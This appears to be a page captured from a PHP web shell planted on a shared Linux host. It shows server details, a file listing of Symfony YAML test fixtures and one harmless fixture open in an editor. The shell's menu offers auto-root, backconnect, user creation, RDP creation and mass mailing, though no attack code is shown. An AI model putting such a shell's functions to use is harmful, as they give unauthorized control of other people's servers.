Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
local /
wp /
vendor /
symfony /
yaml /
Tests /
Fixtures /
[ HOME SHELL ]
Name
Size
Permission
Action
YtsAnchorAlias.yml
839
B
-rw-r--r--
YtsBasicTests.yml
4.17
KB
-rw-r--r--
YtsBlockMapping.yml
899
B
-rw-r--r--
YtsDocumentSeparator.yml
1.48
KB
-rw-r--r--
YtsErrorTests.yml
620
B
-rw-r--r--
YtsFlowCollections.yml
1.54
KB
-rw-r--r--
YtsFoldedScalars.yml
3.83
KB
-rw-r--r--
YtsNullsAndEmpties.yml
653
B
-rw-r--r--
YtsSpecificationExamples.yml
40.33
KB
-rw-r--r--
YtsTypeTransfers.yml
7.2
KB
-rw-r--r--
arrow.gif
185
B
-rw-r--r--
booleanMappingKeys.yml
138
B
-rw-r--r--
embededPhp.yml
31
B
-rw-r--r--
escapedCharacters.yml
2.18
KB
-rw-r--r--
index.yml
312
B
-rw-r--r--
legacyBooleanMappingKeys.yml
303
B
-rw-r--r--
legacyNonStringKeys.yml
50
B
-rw-r--r--
legacyNullMappingKey.yml
94
B
-rw-r--r--
multiple_lines_as_literal_bloc...
361
B
-rw-r--r--
multiple_lines_as_literal_bloc...
116
B
-rw-r--r--
multiple_lines_as_literal_bloc...
105
B
-rw-r--r--
nonStringKeys.yml
59
B
-rw-r--r--
not_readable.yml
312
B
-rw-r--r--
nullMappingKey.yml
98
B
-rw-r--r--
numericMappingKeys.yml
370
B
-rw-r--r--
sfComments.yml
1.88
KB
-rw-r--r--
sfCompact.yml
2.68
KB
-rw-r--r--
sfMergeKey.yml
2.26
KB
-rw-r--r--
sfObjects.yml
279
B
-rw-r--r--
sfQuotes.yml
728
B
-rw-r--r--
sfTests.yml
2.17
KB
-rw-r--r--
unindentedCollections.yml
1.67
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : YtsDocumentSeparator.yml
--- %YAML:1.0 test: Trailing Document Separator todo: true brief: > You can separate YAML documents with a string of three dashes. yaml: | - foo: 1 bar: 2 --- more: stuff python: | [ [ { 'foo': 1, 'bar': 2 } ], { 'more': 'stuff' } ] ruby: | [ { 'foo' => 1, 'bar' => 2 } ] --- test: Leading Document Separator todo: true brief: > You can explicitly give an opening document separator to your YAML stream. yaml: | --- - foo: 1 bar: 2 --- more: stuff python: | [ [ {'foo': 1, 'bar': 2}], {'more': 'stuff'} ] ruby: | [ { 'foo' => 1, 'bar' => 2 } ] --- test: YAML Header todo: true brief: > The opening separator can contain directives to the YAML parser, such as the version number. yaml: | --- %YAML:1.0 foo: 1 bar: 2 php: | ['foo' => 1, 'bar' => 2] documents: 1 --- test: Red Herring Document Separator brief: > Separators included in blocks or strings are treated as blocks or strings, as the document separator should have no indentation preceding it. yaml: | foo: | --- php: | ['foo' => "---\n"] --- test: Multiple Document Separators in Block brief: > This technique allows you to embed other YAML documents within literal blocks. yaml: | foo: | --- foo: bar --- yo: baz bar: | fooness php: | [ 'foo' => "---\nfoo: bar\n---\nyo: baz\n", 'bar' => "fooness\n" ]
Close